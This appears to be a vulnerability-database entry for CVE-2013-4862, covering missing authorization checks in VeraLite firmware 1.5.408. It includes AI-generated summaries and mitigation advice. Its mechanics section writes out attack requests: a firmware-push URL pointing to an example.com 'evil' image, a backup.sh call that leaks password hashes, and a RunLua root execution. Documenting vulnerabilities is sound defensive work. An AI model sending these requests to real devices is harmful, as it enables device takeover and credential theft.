CVE-2013-4862
Description
MiCasaVerde VeraLite with firmware 1.5.408 does not properly restrict access, which allows remote authenticated users to (1) update the firmware via the squashfs parameter to upgrade_step2.sh or (2) obtain hashed passwords via the cgi-bin/cmh/backup.sh page.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
MiCasaVerde VeraLite firmware 1.5.408 has insufficient authorization checks allowing guest users to escalate privileges via firmware update or password hash retrieval.
Vulnerability
The MiCasaVerde VeraLite home automation controller running firmware version 1.5.408 does not properly enforce access controls between Administrator and Guest user roles [1][2]. Specifically, the web interface fails to restrict Guest users from accessing certain sensitive functionalities. Two primary vectors are exposed: the squashfs parameter in upgrade_step2.sh allows a Guest to push custom firmware, and the cgi-bin/cmh/backup.sh page allows retrieval of hashed passwords without requiring Administrator privileges [1][2].
Exploitation
An attacker requires a valid Guest-level account on the VeraLite console, which can be obtained via the local network or through the cloud-based control panel at cp.mios.com [2]. With Guest access, the attacker can directly call upgrade_step2.sh with a crafted squashfs parameter to upload malicious firmware, or access cgi-bin/cmh/backup.sh to retrieve a backup file containing hashed passwords [1][2]. No additional authentication bypass or user interaction is needed beyond the Guest account credentials.
Impact
Successful exploitation allows a Guest user to achieve privilege escalation in two ways: (1) by installing custom firmware, the attacker can gain full control over the device, potentially affecting all home automation functions and network presence; (2) by obtaining password hashes from the backup file, the attacker can attempt offline cracking to recover plaintext passwords, leading to unauthorized root-level access [1][2]. The outcome is a complete compromise of the integrity and confidentiality of the home automation system.
Mitigation
No official firmware patch has been released by MiCasaVerde for this vulnerability, and the VeraLite product is now end-of-life [2]. Affected users should replace the device with a supported model or apply strict network segmentation to limit access to the VeraLite console to trusted users only. The vulnerability is not currently listed on the CISA Known Exploited Vulnerabilities (KEV) catalog [2].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- MiCasaVerde/VeraLitedescription
- Range: = 1.5.408
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing authorization checks allow Guest-level users to access privileged functionality (firmware update, settings backup, and Lua code execution)."
Attack vector
An attacker with a Guest-level authenticated session on the VeraLite (or access to the Internet-based control panel at cp.mios.com as a guest) can exploit missing authorization checks [CWE-285] to escalate privileges [ref_id=1][ref_id=2]. Three attack vectors exist: (A) sending a GET to `/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs` pushes arbitrary firmware to the device, achieving full compromise; (B) sending a GET to `/cgi-bin/cmh/backup.sh?external=1` retrieves sensitive files including hashed passwords; (C) sending a crafted SOAP POST to `/port_49451/upnp/control/hag` with the `RunLua` action executes arbitrary Lua code as root, enabling backdoor account creation [ref_id=1][ref_id=2].
Affected code
The vulnerability affects the VeraLite firmware version 1.5.408. The insufficient authorization checks are present in the web interface scripts `/upgrade_step2.sh` (firmware update) and `/cgi-bin/cmh/backup.sh` (settings backup), as well as the UPnP `RunLua` action exposed via the HomeAutomationGateway service [ref_id=1][ref_id=2].
What the fix does
No patch is included in the bundle. The advisory does not specify whether a fix was ever released by MiCasaVerde. The recommended remediation is to implement proper authorization checks so that Guest-level users cannot access firmware update, settings backup, or Lua code execution functionality [ref_id=1][ref_id=2].
Preconditions
- authAttacker must have a Guest-level authenticated session on the VeraLite web interface or be logged in as a guest at cp.mios.com
- networkAttacker must have network access to the VeraLite device (LAN or via the Internet-based control panel)
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- packetstormsecurity.com/files/122654/MiCasaVerde-VeraLite-1.5.408-Traversal-Authorization-CSRF-Disclosure.htmlmitrex_refsource_MISC
- www.exploit-db.com/exploits/27286mitrex_refsource_MISC
- www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txtmitrex_refsource_MISC
News mentions
0No linked articles in our index yet.